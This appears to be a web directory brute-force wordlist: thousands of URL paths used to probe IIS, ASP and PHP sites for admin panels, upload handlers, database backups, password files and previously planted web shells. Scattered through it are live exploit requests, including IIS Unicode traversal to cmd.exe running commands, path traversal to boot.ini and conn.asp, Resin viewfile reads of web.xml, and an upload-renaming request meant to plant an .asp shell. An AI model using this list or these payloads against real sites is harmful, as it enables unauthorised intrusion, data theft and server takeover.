/scripts/rb.dll
/scripts/rcounter.dll
/scripts/redir.exe
/scripts/repost.asp
/scripts/responder.cgi
/scripts/rguest.exe
/scripts/rksh
/scripts/robadmin.cgi
/scripts/root.exe?/c+dir
/scripts/rpm_query
/scripts/rsh
/scripts/run.exe
/scripts/rwwwshell.pl
/scripts/samples
/scripts/samples/ctguestb.idc
/scripts/samples/details.idc
/scripts/samples/search/author.idq
/scripts/samples/search/filesize.idq
/scripts/samples/search/filetime.idq
/scripts/samples/search/qfullhit.htw
/scripts/samples/search/qsumrhit.htw
/scripts/samples/search/query.idq
/scripts/samples/search/queryhit.idq
/scripts/samples/search/simple.idq
/scripts/samples/search/webhits.exe
/scripts/script.bat
/scripts/script.cmd
/scripts/search.cgi
/scripts/sensepost.exe
/scripts/sensepost.exe?+/c+dir
/scripts/show.pl
/scripts/showfile.asp
/scripts/shtml.dll
/scripts/slxweb.dll
/scripts/sojourn.cgi
/scripts/something.stm
/scripts/spin_client.cgi
/scripts/srchadm/webhits.exe
/scripts/srx.exe?+/c+dir
/scripts/stat
/scripts/stats
/scripts/stats-bin-p/reports/index.html
/scripts/stats.pl
/scripts/stats.prf
/scripts/stats_old
/scripts/statsconfig
/scripts/statview.pl
/scripts/store.cfg
/scripts/store.cgi
/scripts/store.dat
/scripts/store.dbf
/scripts/store.exe
/scripts/store.lst
/scripts/store.php3
/scripts/store.pl
/scripts/store.txt
/scripts/submit.cgi
/scripts/survey
/scripts/survey.cgi
/scripts/tablebuild.pl
/scripts/tcsh
/scripts/test-cgi.tcl
/scripts/test.pl?+.htr
/scripts/testcgi.exe
/scripts/textcounter.pl
/scripts/tidfinder.cgi
/scripts/tigvote.cgi
/scripts/tools
/scripts/tools/details.idc
/scripts/tools/dsnform.exe
/scripts/tools/getdrvrs.exe
/scripts/tools/getdrvs.exe
/scripts/tools/mkilog.exe
/scripts/tools/newdsn.exe
/scripts/tools/uploadn.asp
/scripts/tools/uploadx.asp
/scripts/tpgnrock
/scripts/tradecli.dll?template=..\..\..\..\..\boot.ini
/scripts/tradecli.dll?template=com1
/scripts/ultraboard.cgi
/scripts/ultraboard.pl
/scripts/unlg1.1
/scripts/unlg1.2
/scripts/upload.asp
/scripts/upload.pl
/scripts/uploadn.asp
/scripts/uploadx.asp
/scripts/users.asp
/scripts/users.cfg
/scripts/users.cgi
/scripts/users.data
/scripts/users.dbf
/scripts/users.exe
/scripts/users.htm
/scripts/users.html
/scripts/users.htx
/scripts/users.ini
/scripts/users.lst
/scripts/users.php3
/scripts/users.pl
/scripts/users.txt
/scripts/view-source
/scripts/viewlogs.pl
/scripts/visadmin.exe
/scripts/visitor.exe
/scripts/w3-msql
/scripts/wa.exe
/scripts/we3.3.3/webevent.pl
/scripts/webbbs.cgi
/scripts/webbbs.exe
/scripts/webgais
/scripts/weblog
/scripts/webplus
/scripts/websendmail
/scripts/webutils.pl
/scripts/webwho.pl
/scripts/wguest.exe
/scripts/whois_raw.cgi
/scripts/ws_ftp.ini
/scripts/wsisa.dll
/scripts/www-sql
/scripts/wwwboard
/scripts/wwwboard/wwwboard.cgi
/scripts/wwwboard/wwwboard.pl
/scripts/wwwstats.pl
/servlet/com.livesoftware.jrun.plugins.jsp.jsp
/servlet/com.livesoftware.jrun.plugins.ssi.ssifilter
/servlet/com.unify.ewave.servletexec.uploadservlet
/servlet/count.jsp
/servlet/counter.jsp
/servlet/file/index.jsp
/servlet/file/index.php
/servlet/file/login.jsp
/servlet/jrun.exe
/servlet/serveletrunner.exe
/servlet/servletrunner.exe
/servlet/sessionservlet
/servlet/sunexamples.realmdumpservlet
/servlet/sunexamples.realmdumpservlet%23users-unix
/servlet/test/pathinfo/test
/servlets
/servlets/count.jsp
/root.zip
/root.rar
/wangzhan.rar
/wangzhan.zip
/beifen.zip
/beifen.rar
/1/1/gif.asp
/wokao/1/gif.asp
/wokao/wokao/gif.asp
/DATABASE/Fooee.mdb
/db/YZ_Consume.asp
/data/%23%23%20newDdata8-5-2%23%23.mdb
/shujuku/shujuku3.0.asa
/shujuku/shujuku3.0.mdb
/data/nowshop.asp
/admin/m_bian/db/%23ewebeditor.asp
/admin/%23m_x%23data.asa
/data/admin.mdb
/Database/sk_data.mdb
/etpbook.asp
/Databases/%23wrtxcn2007.asp
/gwrwb5w4btw4b/223fdsagte3q4t65q4q6543/%2370iZ0qJ8a0O1Ffbzp6m.mdb
/gwrwb5w4btw4b/223fdsagte3q4t65q4q6543/%2370iZ0qJ8a0O1Ffbzp6m.asa
/data/%23bjxshop.mdb
/Database/data.mdb
/guestbook.mdb
/diary.mdb
/db/shop1299764859.mdb
/mynews.mdb
/Databackup/shopxp.mdb
/admini
/Users/Login.asp
/Foosun/Admin/login.asp
/server/adminlogin.asp
/shop/admin/index.asp
/admin/index.asp 
/SK_login.asp
/manage/loginadm.asp
/amd_007/admin.asp
/amd_007/index.asp
/amd_007/login.asp
/amd_007/super.asp
../admin/default.asp
../admin/index.asp
../admin/login.asp
../admin/manage.asp
/FCK
/fckedit
/uploadPic.asp?actionType=mod&picName=miao.asp
/admin//uploadPic.asp?actionType=mod&picName=miao.asp
/..default
/..default.asp
/..index
/..index.asp
/..login
/..login.asp
/..manage
/..manage.asp
/Subsitemanage/login.aspx
/\说明.txt
/\说明文档.txt
/_baks/
/_db
/_inc
/_mm/
/_notes/
/0
/20hello&sqspell_use_app=blah&attachment_dir=/tmp&username_sqspell_data=plik
/aadmin
/about.php
/adadmin
/addmin
/adimna
/admin/.htaccess
/admin/admin
/admin/edit
/Admin/Editor
/admin/eweb
/admin/home/
/admin/htmedit
/admin/htmeditor
/admin/htmledit
/admin/htmleditor
/admin/logout.asp
/admin/main.asp
/admin/print/data_1.php
/admin/SouthidcEditor
/admin/up_images.asp
/admin/Upfile_Image.asp
/admin/Upfile_Soft.asp
/admin/Upfile_SoftPic.asp
/admin/upfile1.asp
/admin/upfile2.asp
/admin/Upload_Image.asp
/admin/Upload_Soft.asp
/admin/Upload_SoftPic.asp
/admin/upload1.asp
/admin/upload2.asp
/admin/uppic.asp
/admin/webedit
/admin/webeditor
/admin\ewebeditor\db\%23ewebeditor.mdb
/admin\shopbackup.mdb
/admin_article.aspx
/admin_aspcheck.asp
/admin_backup/
/admin_info
/admin_manager
/admin_productMove.asp
/admin_up.asp
/admin4
/admin5
/admin6
/admin7
/admin777
/admin868
/admin9
/admin99
/admin999
/adminbackup/
/admin-login.aspx
/adminmain
/adminman
/admins/admin.jsp
/AdminUserModule/AdminUserLogin.aspx
/aj
/ajax/
/ajcounter
/amdin
/ArticleShow.asp
/asfq.asp
/ask/admin.php
/ASMAdmin/
/asmASM.asp
/attachments/
/bb
/bbs/cmd.asp
/bbs/hy2005.asp
/bbs/hy2006.asp
/bbs/shell.asp
/bbs/webshell.asp
/bbs-admin.jsp
/bbslogin
/bbsxp
/bjq
/blog/admin.php
/book/admin.jsp
/bossadmin/
/bt
/cache/
/cache/html/
/cc
/CFIDE/administrator/login.cfm
/cgifile.txt
/cheditor/
/Chinese
/chowari/
/Cityadmin
/ciwebhitsfile=/../../winnt/system32/config/system.log&cirestriction=none&cihilitetype=full
/clearadmin/admin.jsp
/cms/admin.jsp
/cn
/com
/config.inc.php
/conndb.asp
/counter.txt
/counter/counter.txt
/counter/user_log.txt
/counter/user_today.txt
/counter/useronline.txt
/cp_upload_image.php
/cpanel/
/CVS/
/data/users.db.php
/databack
/Databasewater
/dbconnect
/dd
/dede
/dede_bbs
/demo/
/department_add.asp
/dg
/domain_manage.jsp
/down/soft
/dv
/e/admin
/edit\db\%23ewebeditor.mdb
/editor/fckeditor/
/editor\db\%23ewebeditor.mdb
/editors
/editubb
/edu
/EducationManager/admin.jsp
/ee
/en
/eneya/eneya888
/eng
/error_log/
/eshop
/eweb/
/ewebedit/admin_login.asp
/ewebeditor\db/edit.mdb
/ewebeditor\db\%23ewebeditor.mdb
/eWebEditor\db\ewebeditor.mdb
/ewebeditornet/
/examples/
/film
/freetextbox/
/gbook
/gm
/goodonline
/guan%5Fli/
/guanli_admin
/guestbook/admin.php
/guide/
/howto.html
/htmedit
/htmedit/db/%23ewebeditor.mdb
/htmeditor
/hvData20060309/
/hvData20060309/asmASM.asp
/hxmir/
/icons/
/iDevAffiliate/
/iissamples/exair/search/qfullhit.htw?
/Inc/conndb.asp
/include/config.asp
/include/config.php
/Include\setting.asp
/indexbat.asp
/install.txt
/install/ 
/install/install.asp
/install/install.php
/JiShuQi/
/kehu
/l888
/li
/light/cp_upload_image.php
/liu
/login/admin.jsp
/login/index.jsp
/logina.asp
/login-admin.jsp
/luntanLogin.jsp
/man
/manage/admin.jsp
/manage/index.jsp
/manage_admin
/Manage_Auto
/manage_news
/manageadmin
/manager/upfile.asp
/manager/upfile1.asp
/manager/upfile2.asp
/manager/upload.asp
/manager/upload1.asp
/manager/upload2.asp
/manager_admin
/master\ewebeditor/upload.asp
/message/admin_login.jsp
/MMWIP/
/mob
/movie
/Ms-admin
/mu
/music
/mydb
/mystat
/na_admin/
/Neeao
/Neeao.asp
/net
/newsadmin/admin.jsp
/newup.asp
/OaLogin.aspx
/oblog
/oblog4
/oledit
/oleditor
/orderadmin/admin.jsp
/penit-admin.jsp
/php_test.php
/phpadmin/
/PHPBB/
/PHPBB2/
/PHPBB3/
/phpeditor
/phpRPG-0.8.0/tmp/
/plc/admin.jsp
/plugins/
/plus
/projects/cgifile.txt
/public_info/
/qqcjp.txt
/qqnum.txt
/README
/relogin-admin.jsp
/resin-doc/
/resin-doc/viewfile/?contextpath=/&servletpath=&file=WEB-INF/web.xml
/savepost.asp
/scfilea.asp
/SEM_User/admin_php/login.php
/server/
/ServerInfo.asp
/servicesystem/login-admin.jsp
/shangchuana.asp
/shopadmin
/sky.asp
/smtp/
/so
/soft
/Soft/Cartoon
/sort
/SouthidcEditor
/squirrelspell/modules/check_me.mod.php?sqspell_app[blah]=wall%
/stock
/stu
/super_admin
/supersite
/supersite4
/supersite5
/sys_admin
/syssite
/syssite/install/
/syssite/shopadmin/
/system_admin
/systemadmin
/tech
/test1
/test2
/test3
/test4
/test5
/todo.txt
/tongji
/tp
/tryread/forbook1.asp 
/tupian
/txl/
/up_images.asp
/up_ingesave.asp
/Upfile_Image.asp
/Upload_Dialog.asp
/Upload_SoftPic.asp
/uploadfiles
/uploadImages
/uploads/crashBox.exe
/uploads/downloadDb.aspx
/uploads/runSpamEngine.php
/uppic.asp
/user/admin.jsp
/user_info
/user_list
/userfiles
/wang
/web.asp
/web_admin
/webadmim/
/WebAdmin/admin.jsp
/webcount
/WebEdit/
/WebEdit/admin/
/WebEdit/admin/upload.asp
/WebEdit\db\dbwebedit%23cc495898.asp
/webFCKeditor
/webgallery/readme_en.txt
/webmanager
/webmodule
/webshell.jsp
/webshell.txt
/websys
/'wp-admin/
/wu
/www_admin
/www_manage/
/www1
/www2
/wwwroot
/xs_admin
/xwzx
/yingyue
/zhang
/zl
/备份
/登陆
/管理
/管理员
/后台
/警告.txt
/密码
/admin/ad_login.asp
/mdb/cm.mdb
/SqlIn/sqlIn_admin.asp 
/guest.asp
/admin/login.asa
/adminer
/superadmin
/xtwh
/程序说明.txt
/***
/adminhh/Login.asp
/admin.asp 
/admin/diy.asp 
/admin/helps.asp 
/admin/myup.asp 
/admin/nsclass.asp 
/admin/save_upfile.asp 
/admin/SouthidcEditor/PopUp.asp 
/admin/upfile-flash.asp 
/admin_user.asp 
/admin/z9v8myup.asp 
/admin/z9v8upfile_flash.asp 
/alexa.rar 
/archives/415.html 
/archives/date/2007/07/01 
/bbs/data/%23cnhww.mdb 
/bs/database/bbsxp.mdb 
/bbs/hy2005.asp 
/bbs/hy2006.asp 
/bbs/webshell.asp 
/bbs/z9v8digshell1.asp 
/bs/z9v8diy.asp 
/bbs/z9v8servu.asp 
/bbs/z9v8servu.aspx 
/bbs/z9v8servu.php 
/blogdata/L-BLOG.mdb 
/cgi-bin/z9v8..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir 
/cgi-bin/z9v8..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir 
/data 
/Databackup/dvbbs7_Backup.mdb 
/Database 
/database/%23database.mdb 
/databases/21asp.mdb 
/ata/dvbbs7.mdb 
/b 
/db/play.asp 
/fdnews.asp 
/flash/downfile.asp?url=jackie/../../conn.asp 
/flash/downfile.asp?url=uploadfile/../../conn.asp 
/isee.asp 
/jhset.asp 
/link/z9v8addlink.asp 
/link/z9v8link_add.asp 
/mdb/etwldbs.mdb 
/mh20
/news/admin/
/news/admin.asp
/new/admin/
/new/admin.asp
/mima.txt 
/irserver.rar 
/usic/z9v8upfile.asp 
/newcomment.asp 
/nopass.asp 
/pass.txt 
/password.txt 
/phpmyadmin 
/qq.test 
/Reg/z9v8User_Reg1.asp 
/Reg/z9v8User_Reg.asp 
/rxjh.asp 
/s8log.txt 
/s8qq.txt 
/shop/upfile_flash.asp 
/showpic.php 
/support/z9v8advertise.asp 
/uerlist.asp 
/upfile_suftpic.asp 
/user/my_picture_upload.asp 
/User/Reg_service.asp 
/user_upfile.asp 
/User/User_Space.asp 
/af../winnt/system32/cmd.exe?/c+dir 
/_vti_pvt/z9v8authors.pwd 
/wwroot.zip 
/新建%20文本文档.txt 
/joke/login.asp
/admin/eweb/
/manage/eweb
/guadmin/login.asp
/!admin!/
/%23sql.asp
/%23sql.aspx
/%23sql.php
/../admin
/houtai
/../admin.asp
/../admin.aspx
/../admin.php
/../admin/default
/../admin/default.asp
/../admin/default.aspx
/../admin/default.php
/../admin/index
/../admin/index.asp
/../admin/index.aspx
/../admin/index.php
/../admin/login
/../admin/login.asp
/../admin/login.aspx
/../admin/login.php
/../admin/manage
/../admin/manage.asp
/../admin/manage.aspx
/../admin/manage.php
//admin/login.asp
//admin/login.aspx
//admin/login.php
//szwyadmin/login.asp
//szwyadmin/login.aspx
//szwyadmin/login.php
/_Admin
/_admin.asp
/_admin.aspx
/_admin.php
/_Admin/
/_database/
/1.asa
/1.asp
/1.aspx
/1.php
/1.rar
/1.txt
/11.asa
/11.asp
/11.aspx
/11.php
/11.rar
/11/
/111.asa
/111.asp
/111.aspx
/111.php
/111.rar
/111/
/11111/
/11111/index.asp
/11111/index.aspx
/11111/index.php
/115cn.asp
/115cn.aspx
/115cn.php
/123.asa
/123.asp
/123.aspx
/123.php
/123.rar
/123.txt
/123/
/1234.asa
/1234.asp
/1234.aspx
/1234.php
/1234.rar
/12345.asa
/12345.asp
/12345.aspx
/12345.php
/12345.rar
/123456.asa
/123456.asp
/123456.aspx
/123456.php
/123456.rar
/12912.asp
/12912.aspx
/12912.php
/1ndex.asp
/1ndex.aspx
/1ndex.php
/2.txt
/2/
/2001/
/2002/
/2003/
/2004/
/2005/
/2005kycj/
/2006.asp
/2006.aspx
/2006.php
/2006/
/2007/
/2008/
/2088shop
/22.asa
/22.asp
/22.aspx
/22.php
/22.rar
/22/
/222.asa
/222.asp
/222.aspx
/222.php
/222.rar
/222/
/2fly_gift.php
/3.asa
/3.asp
/3.aspx
/3.php
/3.rar
/3.txt
/33.asa
/33.asp
/33.aspx
/33.php
/33.rar
/333.asa
/333.asp
/333.aspx
/333.php
/333.rar
/3800cc.asp
/3800cc.aspx
/3800cc.php
/4/
/5/
/6/
/6k.asp
/6k.aspx
/6k.php
/7/
/8/
/88888/
/88888/index.asp
/88888/index.aspx
/88888/index.php
/9/
/a
/a.asa
/a.asp
/a.aspx
/a.php
/a_admin.asp
/a_admin.aspx
/a_admin.aspxx
/a_admin.jsp
/a_admin.php
/a_admin.phpx
/A_Login.asp
/A_Login.aspx
/A_Login.php
/a_main.asp
/a_main.aspx
/a_main.php
/aa.asa
/aa.asp
/aa.aspx
/aa.php
/aaa.asa
/aaa.asp
/aaa.aspx
/aaa.php
/aadmin/
/abc
/abc/
/abcupload
/abcupload/
/about
/about/
/acblog.asa
/AccessDB/
/account
/account.asp
/account.aspx
/account.html
/account.php
/account/
/accounts
/accounts/
/acct/
/acct/login.asp
/acct/login.aspx
/acct/login.php
/acct_login
/ad
/ad.asp
/ad.aspx
/ad.php
/ad/
/Ad_Admin
/Ad_Admin/
/ad_admin/admin_login.asp
/ad_admin/admin_login.aspx
/ad_admin/admin_login.php
/ad_admin_login.asp
/ad_admin_login.aspx
/ad_admin_login.php
/ad_login
/ad_login.asp
/ad_login.aspx
/ad_login.php
/ad_login/
/ad_manage
/ad_manage.asp
/ad_manage.aspx
/ad_manage.php
/ad_manage/
/adadmin/
/Add
/add.asp
/add.aspx
/add.php
/Add/
/add_admin
/add_admin.asp
/add_admin.aspx
/add_admin.php
/add_admin/
/add_user.asp
/add_user.aspx
/add_user.php
/addFile.asp
/addFile.aspx
/addFile.php
/addlb.asp
/addlb.aspx
/addlb.php
/addmember.asp
/addmember.aspx
/addmember.php
/addmember/
/addmin/
/addPicture.asp
/addPicture.aspx
/addPicture.php
/adduser.asp
/adduser.aspx
/adduser.php
/adduser/
/adlogin
/adlogin.asp
/adlogin.aspx
/adlogin.php
/adlogin/
/adm
/adm.asp
/adm.aspx
/adm.php
/Adm/
/adm@in
/adm@in/
/Adm_Login
/adm_login.asp
/adm_login.aspx
/adm_login.php
/adm_login/
/adm_menu.asp
/adm_menu.aspx
/adm_menu.php
/admanage
/admanage/
/admcheck.asp
/admcheck.aspx
/admcheck.php
/admcheckform.asp
/admcheckform.aspx
/admcheckform.php
/admin
/admin.asp
/admin.aspx
/admin.aspxx
/admin.htm
/admin.html
/admin.jsp
/admin.php
/admin.phpx
/admin/
/admin/account.asp
/admin/account.aspx
/admin/account.html
/admin/account.php
/admin/adm_menu.asp
/admin/adm_menu.aspx
/admin/adm_menu.php
/admin/admin.asp
/admin/admin.aspx
/admin/admin.aspxx
/admin/admin.jsp
/admin/admin.php
/admin/admin.phpx
/admin/admin_6list.asp
/admin/admin_6list.aspx
/admin/admin_6list.php
/Admin/Admin_Index.asp
/Admin/Admin_Index.aspx
/Admin/Admin_Index.php
/admin/admin_login.asp
/admin/admin_login.aspx
/admin/admin_login.php
/admin/admin_upfile.asp
/admin/admin_upfile.aspx
/admin/admin_upfile.php
/admin/adminlogin.asp
/admin/adminlogin.aspx
/admin/adminlogin.php
/admin/aspcheck.asp
/admin/aspcheck.aspx
/admin/aspcheck.php
/admin/controlpanel.asp
/admin/controlpanel.aspx
/admin/controlpanel.html
/admin/controlpanel.php
/admin/cp.asp
/admin/cp.aspx
/admin/cp.html
/admin/cp.php
/admin/default
/admin/default.asp
/admin/Default.asp?
/admin/default.aspx
/admin/Default.aspx?
/admin/default.php
/admin/Default.php?
/admin/default/admin.asp
/admin/default/admin.aspx
/admin/default/admin.php
/admin/default/login.asp
/admin/default/login.aspx
/admin/default/login.php
/admin/edit/admin_login.asp
/admin/edit/admin_login.aspx
/admin/edit/admin_login.php
/admin/edit/db/ewebeditor.mdb
/admin/editor/admin_login.asp
/admin/editor/admin_login.asp?
/admin/editor/admin_login.aspx
/admin/editor/admin_login.aspx?
/admin/editor/admin_login.php
/admin/editor/admin_login.php?
/admin/editor/db/ewebeditor.mdb
/admin/editor/editor/filemanager/upload/test.html
/admin/eWebEditor/admin_login.asp
/admin/eWebEditor/admin_login.aspx
/admin/eWebEditor/admin_login.php
/admin/ewebeditor/db/ewebeditor.mdb
/admin/eWebEditor_v280_Free/admin_login.asp
/admin/eWebEditor_v280_Free/admin_login.aspx
/admin/eWebEditor_v280_Free/admin_login.php
/admin/eWebEditor_v280_Free/db/ewebeditor.mdb
/admin/eWebEditordb/ewebeditor.mdb
/admin/FCKeditor/ 
/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp
/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.aspx
/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.php
/admin/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp
/admin/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.aspx
/admin/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.php
/admin/FCKeditor/editor/filemanager/upload/test.html
/admin/go.asp
/admin/go.aspx
/admin/go.php
/admin/home.asp
/admin/home.aspx
/admin/home.php
/admin/htmedit/admin_login.asp
/admin/htmedit/admin_login.aspx
/admin/htmedit/admin_login.php
/admin/htmedit/db/ewebeditor.mdb
/admin/index
/admin/index.asp
/admin/index.aspx
/admin/index.html
/admin/index.php
/admin/left.asp
/admin/left.aspx
/admin/left.php
/admin/login
/admin/login.asp
/admin/login.aspx
/admin/login.html
/admin/login.php
/admin/lygofa.asp
/admin/lygofa.aspx
/admin/lygofa.php
/admin/manage
/admin/manage.asp
/admin/manage.aspx
/admin/manage.php
/admin/manage/admin.asp
/admin/manage/admin.aspx
/admin/manage/admin.php
/admin/manage/login.asp
/admin/manage/login.aspx
/admin/manage/login.php
/admin/menu.asp
/admin/menu.aspx
/admin/menu.php
/admin/news.asp
/admin/news.aspx
/admin/news.php
/admin/ows_login.asp
/admin/ows_login.aspx
/admin/ows_login.php
/admin/Select_feedback.asp
/admin/Select_feedback.aspx
/admin/Select_feedback.php
/admin/test.asp/info.asp
/admin/test.aspx/info.aspx
/admin/test.php/info.php
/admin/upfile.asp
/admin/upfile.aspx
/admin/upfile.php
/admin/upload.asp
/admin/upload.aspx
/admin/upload.php
/admin/uploadfaceok.asp
/admin/uploadfaceok.aspx
/admin/uploadfaceok.php
/admin/user_login.asp
/admin/user_login.aspx
/admin/user_login.php
/admin/web_login.asp
/admin/web_login.aspx
/admin/web_login.php
/admin/WebEditor/admin_login.asp
/admin/WebEditor/admin_login.aspx
/admin/WebEditor/admin_login.php
/admin/WebEditor/db/ewebeditor.mdb
/admin/xh_login.asp
/admin/xh_login.aspx
/admin/xh_login.php
/admin/yns_login.asp
/admin/yns_login.aspx
/admin/yns_login.php
/admin_.asp
/admin_.aspx
/admin_.php
/admin_6list.asp
/admin_6list.aspx
/admin_6list.php
/admin_999/
/admin_admin
/admin_admin.asp
/admin_admin.aspx
/admin_admin.jsp
/admin_admin.php
/admin_admin/
/admin_area
/admin_backup.asp
/admin_backup.aspx
/admin_backup.php
/admin_backupdata.asp
/admin_backupdata.aspx
/admin_backupdata.php
/Admin_Bak
/admin_bak.asp
/admin_bak.aspx
/admin_bak.php
/Admin_Bak/
/Admin_BatchLink.asp
/Admin_BatchLink.aspx
/Admin_BatchLink.php
/admin_body.asa
/admin_body.asp
/admin_body.aspx
/admin_body.php
/admin_config.asp
/admin_config.asp.bak
/admin_config.aspx
/admin_config.aspx.bak
/admin_config.php
/admin_config.php.bak
/admin_count.asp
/admin_count.aspx
/admin_count.php
/admin_cp/
/Admin_Cy/
/admin_data.asp
/admin_data.asp.bak
/admin_data.asp?action=BackupData
/admin_data.asp?action=RestoreData
/admin_data.aspx
/admin_data.aspx.bak
/admin_data.aspx?action=BackupData
/admin_data.aspx?action=RestoreData
/admin_data.php
/admin_data.php.bak
/admin_data.php?action=BackupData
/admin_data.php?action=RestoreData
/Admin_DataBackup.asp
/Admin_DataBackup.aspx
/Admin_DataBackup.php
/Admin_Database.asp
/Admin_Database.aspx
/Admin_Database.php
/admin_db_backup.asp
/admin_db_backup.asp?action=BackupData
/admin_db_backup.asp?action=RestoreData
/admin_db_backup.aspx
/admin_db_backup.aspx?action=BackupData
/admin_db_backup.aspx?action=RestoreData
/admin_db_backup.php
/admin_db_backup.php?action=BackupData
/admin_db_backup.php?action=RestoreData
/admin_default.asp
/admin_Default.asp?
/admin_default.aspx
/admin_Default.aspx?
/admin_default.php
/admin_Default.php?
/admin_del.asp
/admin_del.aspx
/admin_del.php
/admin_del/
/admin_delete.asp
/admin_delete.aspx
/admin_delete.php
/admin_delete/
/admin_edit.asp
/admin_edit.aspx
/admin_edit.php
/admin_edit/
/admin_EditPass.asp
/admin_EditPass.aspx
/admin_EditPass.php
/Admin_Field.asp
/Admin_Field.aspx
/Admin_Field.php
/admin_forums.asp
/admin_forums.aspx
/admin_forums.php
/admin_guanli/
/Admin_Help_User.asp
/Admin_Help_User.aspx
/Admin_Help_User.php
/admin_home.asp
/admin_home.aspx
/admin_home.php
/admin_home/
/admin_htmlqx.asp
/admin_htmlqx.aspx
/admin_htmlqx.php
/admin_IF5KBM/
/admin_index
/admin_index.asa
/admin_index.asp
/admin_index.aspx
/admin_index.jsp
/admin_index.php
/admin_index/
/admin_index/admin_index.asp
/admin_index/admin_index.aspx
/admin_index/admin_index.php
/admin_index/login.asp
/admin_index/login.aspx
/admin_index/login.php
/admin_info.asp
/admin_info.aspx
/admin_info.php
/admin_info/
/Admin_jsCreate.asp
/Admin_jsCreate.aspx
/Admin_jsCreate.php
/admin_jy1001/
/Admin_Label.asp
/Admin_Label.aspx
/Admin_Label.php
/admin_login
/admin_login.asa
/admin_login.asp
/admin_login.aspx
/admin_login.jsp
/admin_login.php
/admin_login/
/admin_login/admin.asp
/admin_login/admin.aspx
/admin_login/admin.php
/admin_login/login.asp
/admin_login/login.aspx
/admin_login/login.php
/admin_login_lg.asp
/admin_login_lg.aspx
/admin_login_lg.php
/Admin_Login588.asp
/Admin_Login588.aspx
/Admin_Login588.php
/Admin_Login8.asp
/Admin_Login8.aspx
/Admin_Login8.php
/Admin_Login888.asp
/Admin_Login888.aspx
/Admin_Login888.php
/admin_loginadmin/
/Admin_Maillist.asp
/Admin_Maillist.aspx
/Admin_Maillist.php
/admin_main
/admin_main.asp
/admin_main.aspx
/admin_main.php
/admin_main/
/admin_manage/
/admin_manage/login.asp
/admin_manage/login.aspx
/admin_manage/login.php
/admin_manage_access/Admin_Default.asp
/admin_manage_access/Admin_Default.aspx
/admin_manage_access/Admin_Default.php
/admin_manage_access/login.asp
/admin_manage_access/login.aspx
/admin_manage_access/login.php
/admin_manager/
/admin_master.asp
/admin_master.aspx
/admin_master.php
/admin_member.asp
/admin_member.aspx
/admin_member.php
/Admin_Message.asp
/Admin_Message.aspx
/Admin_Message.php
/admin_move/
/admin_move/Admin_Login.asp
/admin_move/Admin_Login.aspx
/admin_move/Admin_Login.php
/admin_pass
/admin_pass.asp
/admin_pass.aspx
/admin_pass.php
/admin_pass/
/Admin_Photo.asp
/Admin_Photo.aspx
/Admin_Photo.php
/admin_php/
/admin_Restoredata.asp
/admin_Restoredata.aspx
/admin_Restoredata.php
/admin_server.asp
/admin_server.aspx
/admin_server.php
/admin_set.asp
/admin_set.aspx
/admin_set.php
/admin_setting.asp
/admin_setting.aspx
/admin_setting.php
/admin_setup.asp
/admin_setup.aspx
/admin_setup.php
/admin_soft.asp
/admin_soft.aspx
/admin_soft.aspxx
/admin_soft.jsp
/admin_soft.php
/admin_soft.phpx
/Admin_SoftCateMenu.Asp
/Admin_SoftCateMenu.aspx
/Admin_SoftCateMenu.php
/Admin_SoftInfo.asp
/Admin_SoftInfo.aspx
/Admin_SoftInfo.php
/Admin_SoftLink.asp
/Admin_SoftLink.aspx
/Admin_SoftLink.php
/Admin_SoftList.asp
/Admin_SoftList.aspx
/Admin_SoftList.php
/admin_sql.asp
/admin_sql.aspx
/admin_sql.php
/admin_style.asp
/admin_style.aspx
/admin_style.php
/Admin_SubCate.asp
/Admin_SubCate.aspx
/Admin_SubCate.php
/Admin_Test
/admin_test.asp
/admin_test.aspx
/admin_test.php
/Admin_Test/
/Admin_UpdateSoftNum.asp
/Admin_UpdateSoftNum.aspx
/Admin_UpdateSoftNum.php
/admin_upfile.asp
/admin_upfile.aspx
/admin_upfile.php
/admin_upload.asp
/admin_upload.aspx
/admin_upload.php
/admin_uploadF.asp
/admin_uploadF.aspx
/admin_uploadF.php
/admin_uploadfile.asp
/admin_uploadfile.aspx
/admin_uploadfile.php
/Admin_UploadFile_Style.asp
/Admin_UploadFile_Style.aspx
/Admin_UploadFile_Style.php
/admin_uploadfile_user.asp
/admin_uploadfile_user.aspx
/admin_uploadfile_user.php
/admin_user
/admin_user.asp
/admin_user.aspx
/admin_user.php
/admin_user/
/Admin_UserSetting.asp
/Admin_UserSetting.aspx
/Admin_UserSetting.php
/admin_webmaster.asp
/admin_webmaster.aspx
/admin_webmaster.php
/admin_yuzhiguo/
/admin_yuzhiguo/login.asp
/admin_yuzhiguo/login.aspx
/admin_yuzhiguo/login.php
/Admin_ZgTea_Art/
/Admin_ZgTea_Art/Login.asp
/Admin_ZgTea_Art/Login.aspx
/Admin_ZgTea_Art/Login.php
/admin1
/admin1.asp
/admin1.aspx
/admin1.html
/admin1.php
/admin1/
/admin1/Admin_Login.asp
/admin1/Admin_Login.aspx
/admin1/Admin_Login.php
/admin123
/admin123.asp
/admin123.aspx
/admin123.php
/admin123/
/Admin2
/admin2.asp
/admin2.aspx
/admin2.html
/admin2.php
/Admin2/
/Admin3
/Admin3/
/admin4_account
/admin4_colon
/admin868/
/admin888
/admin888.asp
/admin888.aspx
/admin888.php
/admin888/
/admin99/
/adminadduser.asp
/adminadduser.aspx
/adminadduser.php
/adminadduser/
/adminadmin
/adminadmin.asp
/adminadmin.aspx
/adminadmin.php
/adminadmin/
/adminceo.asp
/adminceo.aspx
/adminceo.php
/admincheck.asp
/admincheck.aspx
/admincheck.php
/admincn2008/
/admincn2008/login.asp
/admincn2008/login.aspx
/admincn2008/login.php
/adminconn.inc
/admincontrol.asp
/admincontrol.aspx
/admincontrol.html
/admincontrol.php
/admincp
/AdminCp/
/admincs.asp
/admincs.aspx
/admincs.php
/admincxfb.asp
/admincxfb.aspx
/admincxfb.php
/adminda.asp
/adminda.aspx
/adminda.php
/adminDefault.asp?
/adminDefault.aspx?
/adminDefault.php?
/admindel.asp
/admindel.aspx
